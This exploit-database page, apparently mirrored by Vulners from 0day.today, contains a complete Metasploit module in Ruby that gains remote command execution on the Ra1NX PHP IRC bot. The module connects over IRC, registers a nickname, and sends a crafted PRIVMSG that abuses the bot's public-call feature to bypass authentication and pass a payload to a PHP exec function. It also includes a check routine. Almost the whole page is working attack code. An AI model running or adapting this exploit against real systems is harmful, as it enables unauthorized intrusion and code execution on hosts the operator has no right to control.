Lucene search
K

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

🗓️ 25 Mar 2013 00:00:00Reported by bwallType 
zdt
 zdt
🔗 0day.today👁 21 Views

Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution allows remote command execution on Ra1NX PHP IRC bot using public call feature to bypass authentication system

Code
# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
            'Description'    => %q{
                    This module allows remote command execution on the PHP IRC bot Ra1NX by
                    using the public call feature in private message to covertly bypass the
                    authentication system.
                },
            'Author'         =>
                [
                    'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
                    ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
                    ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
                ],
            'Platform'       => [ 'unix', 'win'],
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'    => 344,
                    'BadChars' => '',
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                        }
                },
            'Targets'  =>
                [
                    [ 'Ra1NX', { } ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'March 24 2013',
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(6667),
                OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
                OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
                OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
                OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
            ], self.class)
    end
 
    def check
        connect
 
        response = register(sock)
        if response =~ /463/ or response =~ /464/
            print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
            return Exploit::CheckCode::Unknown
        end
        confirm_string = rand_text_alpha(8)
        response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
        print response
        quit(sock)
        disconnect
 
        if response =~ /#{confirm_string}/
            return Exploit::CheckCode::Vulnerable
        else
            return Exploit::CheckCode::Safe
        end
    end
 
    def send_msg(sock, data)
        sock.put(data)
        data = ""
        begin
            read_data = sock.get_once(-1, 1)
            while not read_data.nil?
                data << read_data
                read_data = sock.get_once(-1, 1)
            end
        rescue EOFError
        end
        data
    end
 
    def register(sock)
        msg = ""
 
        if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
            msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
        end
 
        if datastore['NICK'].length > 9
            nick = rand_text_alpha(9)
            print_error("The nick is longer than 9 characters, using #{nick}")
        else
            nick = datastore['NICK']
        end
 
        msg << "NICK #{nick}\r\n"
        msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
 
        response = send_msg(sock,msg)
        return response
    end
 
    def ra1nx_command(sock)
        encoded = payload.encoded
        command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
        response = send_msg(sock, command_msg)
        return response
    end
 
    def quit(sock)
        quit_msg = "QUIT :bye bye\r\n"
        sock.put(quit_msg)
    end
 
    def exploit
        connect
 
        print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
        response = register(sock)
        if response =~ /463/ or response =~ /464/
            print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
            return
        end
 
        print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
        ra1nx_command(sock)
 
        quit(sock)
        disconnect
    end
end

#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation